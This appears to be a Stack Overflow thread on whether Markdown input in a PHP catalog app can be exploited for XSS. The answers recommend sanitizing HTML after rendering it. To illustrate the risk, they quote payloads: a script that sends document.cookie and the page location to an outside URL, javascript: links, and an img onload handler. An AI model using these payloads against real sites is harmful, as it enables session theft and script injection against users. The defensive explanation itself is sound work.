
I'm working on a web application that allows users to type short descriptions of items in a catalog. I'm allowing Markdown in my textareas so users can do some HTML formatting.

My text sanitization function strips all tags from any inputted text before inserting it in the database:

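public function sanitizeText($string, $allowedTags = "") {
    // Remove every HTML tag except those listed in $allowedTags.
    $string = strip_tags($string, $allowedTags);

    // Undo magic-quotes escaping (if enabled) before escaping for MySQL.
    if(get_magic_quotes_gpc()) {
        return mysql_real_escape_string(stripslashes($string));
    } else {
        return mysql_real_escape_string($string);
    }
}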

Essentially, all I'm storing in the database is Markdown--no other HTML, even "basic HTML" (like here at SO) is allowed.

Will allowing markdown present any security threats? Can markdown be XSSed, even though it has no tags?



I think stripping every HTML tag from the input will get you something pretty secure, unless someone finds a way to feed Markdown some really messed-up data that makes it generate even more messed-up output ^^

Still, two things come to mind:

First: strip_tags is not a miracle function; it has some flaws.
For instance, it strips everything after the '<' in a situation like this one:

$str = "10 apples is <than 12 apples";

Passing it through strip_tags, the output I get is:

string '10 apples is ' (length=13)

Which is not that nice for your users :-(

Second: one day or another, you might want to allow some HTML tags or attributes; or, even today, you might want to be sure that Markdown doesn't generate certain HTML tags or attributes.

You might be interested in something like HTMLPurifier: it lets you specify which tags and attributes should be kept, and filters a string so that only those remain.

It also generates valid HTML code, which is always nice ;-)


Here's a lovely example of why you need to sanitize the HTML after rendering the Markdown, not before:

Markdown code:

>  <script type="text/javascript"
>  language="js">i=new Image\(\); i.src=''
> + escape\(window.location\) + '&c=' + escape\(document.cookie\);
> </script>

Rendered as:

<p><script type="text/javascript"
 language="js">i=new Image(); i.src=''
+ escape(window.location) + '&amp;c=' + escape(document.cookie);

Now are you worried?

Sanitizing the resulting HTML after rendering the Markdown is going to be safest. If you don't, I think people would be able to execute arbitrary JavaScript in Markdown like so:

[Click me](javascript:alert\('Gotcha!'\);)

PHP Markdown converts this to:

<p><a href="javascript:alert&#40;'Gotcha!'&#41;;">Click me</a></p>

Which does the job. And don't even think about adding your own code to take care of these cases. Correct sanitization isn't easy; just use a good tool and apply it after you render your Markdown into HTML.
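The render-then-sanitize order described above could be sketched roughly as follows. This is only an illustration under stated assumptions: `renderUntrustedMarkdown`, `makePurifier` and the tag allow-list are hypothetical names and choices, not part of the question's code. `makePurifier` assumes HTML Purifier (the library suggested in another answer) is installed and autoloadable, and the Markdown renderer is passed in as a callable because the entry point depends on which Markdown library and version you use.

```php
<?php
// Sketch only: the function names and the allow-list below are illustrative assumptions.

/**
 * Render untrusted Markdown, then sanitize the resulting HTML.
 * The sanitizer always runs last, on the HTML the browser will actually see.
 */
function renderUntrustedMarkdown(string $markdown, callable $render, callable $purify): string
{
    $html = $render($markdown);   // Markdown -> HTML (may still contain unsafe markup)
    return $purify($html);        // HTML -> allow-listed HTML
}

/**
 * Build a sanitizer callable backed by HTML Purifier.
 * Assumes the library is installed and autoloadable.
 */
function makePurifier(): callable
{
    $config = HTMLPurifier_Config::createDefault();
    // Keep only the tags/attributes that Markdown output is expected to need.
    $config->set('HTML.Allowed', 'p,br,em,strong,ul,ol,li,blockquote,code,pre,a[href]');
    // Permit only ordinary link schemes; javascript: is not among them.
    $config->set('URI.AllowedSchemes', ['http' => true, 'https' => true, 'mailto' => true]);
    $purifier = new HTMLPurifier($config);

    return function (string $html) use ($purifier): string {
        return $purifier->purify($html);
    };
}
```

With the classic PHP Markdown script, which exposes a `Markdown()` function, the call might look like `renderUntrustedMarkdown($text, 'Markdown', makePurifier())`. Passing both steps in as callables keeps the ordering in one place, so the sanitizer cannot accidentally be applied before rendering.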

Will allowing markdown present any security threats? Can markdown be XSSed, even though it has no tags?

It's almost impossible to make absolute statements in that regard - who can say what the markdown parser can be tricked into with sufficiently malformed input?

However, the risk is probably very low, since it is a relatively simple syntax. The most obvious angle of attack would be javascript: URLs in links or images - probably not allowed by the parser, but it's something I'd check out.
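One way to do that check is to render a few test inputs and look at which URL schemes end up in the output. The helper below is a rough sketch for testing a parser, not a sanitizer: `listUrlSchemes` is a hypothetical name, it relies on PHP's DOM extension, and its simple scheme pattern will not catch obfuscated schemes, so it should not be used as a filter.

```php
<?php
// Sketch of a test helper (not a sanitizer): list the URL schemes used by links
// and images in rendered HTML, so unexpected ones such as "javascript" stand out.
function listUrlSchemes(string $html): array
{
    $doc = new DOMDocument();
    $previous = libxml_use_internal_errors(true); // silence warnings on HTML fragments
    $doc->loadHTML('<div>' . $html . '</div>');
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $schemes = [];
    foreach ([['a', 'href'], ['img', 'src']] as [$tag, $attribute]) {
        foreach ($doc->getElementsByTagName($tag) as $element) {
            $url = trim($element->getAttribute($attribute));
            // A leading "name:" is treated as the scheme; relative URLs have none.
            if (preg_match('/^([a-z][a-z0-9+.\-]*):/i', $url, $match)) {
                $schemes[] = strtolower($match[1]);
            }
        }
    }
    return array_values(array_unique($schemes));
}

// The HTML that PHP Markdown is reported to produce for the "Click me" link shown earlier.
$rendered = '<p><a href="javascript:alert&#40;\'Gotcha!\'&#41;;">Click me</a></p>';
print_r(listUrlSchemes($rendered));
```

Any scheme in the result other than the ones you expect (for example `http`, `https`, `mailto`) is a sign that the parser's output needs sanitizing.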

No. The way you are using Markdown is not secure. Markdown can be used securely, but you have to use it right. For details on how to use Markdown securely, look here; the short version is: it is important to use the latest version, to set safe_mode, and to set enable_attributes=False.

The link also explains why escaping the input and then calling Markdown (as you are doing) is not sufficient to be secure. Short example: "[clickme](javascript:alert%28%22xss%22%29)".
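To see why cleaning the input before rendering does not help here, note that the payload contains no tags and no HTML special characters at all. A small sketch using only PHP built-ins (the variable names are illustrative):

```php
<?php
// The payload from the answer above: no '<', '>', '&' or quotes anywhere in it.
$payload = '[clickme](javascript:alert%28%22xss%22%29)';

// Tag stripping has nothing to strip...
$stripped = strip_tags($payload);

// ...and HTML-escaping has nothing to escape.
$escaped = htmlspecialchars($payload, ENT_QUOTES, 'UTF-8');

var_dump($stripped === $payload); // bool(true)
var_dump($escaped === $payload);  // bool(true)
```

The string reaches the Markdown parser untouched, so whether the `javascript:` link becomes live depends entirely on the parser and on whatever sanitizing happens after rendering.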

BBcode provides more safety because you are generating the tags.

<img src="" onload="javascript:alert(\'haha\');"/>

If <img> is allowed, this will go straight through strip_tags ;) Bam !
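This is easy to confirm, since strip_tags filters by tag name only and leaves the attributes of an allowed tag alone. A minimal sketch (variable names are illustrative):

```php
<?php
// strip_tags() filters by tag name only; attributes on an allowed tag are kept.
$input  = '<img src="" onload="javascript:alert(\'haha\');"/>';
$output = strip_tags($input, '<img>');

// The event-handler attribute is still present in the output.
var_dump(strpos($output, 'onload') !== false); // bool(true)
```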

I agree with Pascal MARTIN that HTML Sanitization is a better approach. If you want to do it entirely in JavaScript I suggest taking a look at google-caja's sanitization library (source code).

Licensed under: CC-BY-SA with attribution